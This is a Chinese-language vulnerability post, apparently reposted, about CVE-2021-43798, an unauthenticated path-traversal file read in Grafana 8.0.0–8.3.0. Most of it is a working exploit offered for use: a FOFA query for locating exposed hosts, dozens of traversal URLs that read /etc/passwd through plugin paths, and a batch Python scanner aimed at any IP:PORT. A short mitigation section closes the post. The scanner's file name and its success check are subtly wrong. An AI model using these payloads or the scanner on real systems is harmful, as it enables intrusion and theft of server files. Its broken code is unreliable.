CVE-2021-43798
- 危害等級
- FOFA 查詢
- 影響范圍
- 漏洞測驗
- 批量POC
- 修復建議
Grafana是一個跨平臺、開源的資料可視化網路應用程式平臺,用戶配置連接的資料源之后,Grafana可以在網路瀏覽器里顯示資料圖表和警告,
Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗證的情況下可通過該漏洞讀取主機上的任意檔案,
危害等級
高危
FOFA 查詢
app="Grafana"
影響范圍
Grafana 8.0.0 - 8.3.0
漏洞測驗
payload
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
批量POC
payload.txt
alertGroups
alertlist
alertmanager
annolist
barchart
bargauge
canvas
cloudwatch
dashboard
dashlist
debug
elasticsearch
gauge
geomap
gettingstarted
grafana-azure-monitor-datasource
grafana
graph
graphite
heatmap
histogram
influxdb
jaeger
live
logs
loki
mixed
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table-old
table
tempo
testdata
text
timeseries
welcome
xychart
zipkin
cloud-monitoring
cloudwatch
alertmanager
dashboard
使用介紹:
python3 exp.py IP:PORT
# coding=utf-8
# 作者:李白
import requests
import sys
args = str(sys.argv[1])
f = open("./paload.txt")
for line in f:
url = "http://"+args+"/public/plugins/"+str.rstrip(line)+"/../../../../../../../../../../../etc/passwd"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
}
req = requests.post(url, headers=headers,timeout=(3,7),allow_redirects=False)
a=req.text
str1='root'
if a in str1:
print('確認存在'+str.rstrip(line)+'路徑,并存在漏洞!')
print(url)
else:
print('不存在漏洞!')
修復建議
目前沒有詳細的解決方案提供,請關注廠商主頁更新:https://grafana.com/
臨時修復建議:
1、通過防火墻等安全設備設定訪問策略,設定白名單訪問,
2、如非必要,禁止公網訪問該系統,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/385503.html
標籤:其他